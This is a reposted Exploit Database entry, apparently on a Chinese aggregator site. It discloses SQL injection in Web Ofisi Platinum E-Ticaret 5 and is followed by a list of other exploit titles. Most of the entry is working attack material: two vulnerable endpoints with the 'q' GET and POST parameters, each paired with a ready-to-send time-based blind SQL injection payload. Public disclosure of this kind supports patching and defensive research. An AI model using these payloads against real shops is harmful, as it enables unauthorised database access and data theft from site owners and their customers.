Web Ofisi Platinum E-Ticaret 5 – ‘q’ SQL Injection

Exploit Database
17 阅读

作者： Ahmet Ümit BAYRAM

日期： 2019-07-19
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/47140/

# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
# Demo Site: http://demobul.net/eticaretv5/
# Version: v5
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/arama?kategori=&q=
Vulnerable Parameter: q (GET)
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/ajax/productsFilterSearch
Vulnerable Parameter: q (POST)
Payload:
kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1

last Exploits
Web Ofisi Platinum E-Ticaret 5 – ‘q’ SQL Injection的更多信息

Joomla! com_fabrik 3.9.11 – Directory Traversal：
vBSEO – ‘u’ Cross-Site Scripting：
JBoss JMXInvokerServlet JMXInvoker 0.3 – Remote Command Execution：
Dolibarr ERP/CRM 3.1.0 – ‘/admin/boxes.php?rowid’ SQL Injection：
Apache JackRabbit – WebDAV XML External Entity：
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection：
Booked Scheduler 2.7.5 – Remote Command Execution (RCE) (Authenticated)：
elproLOG MONITOR Webaccess 2.1 – Multiple Vulnerabilities：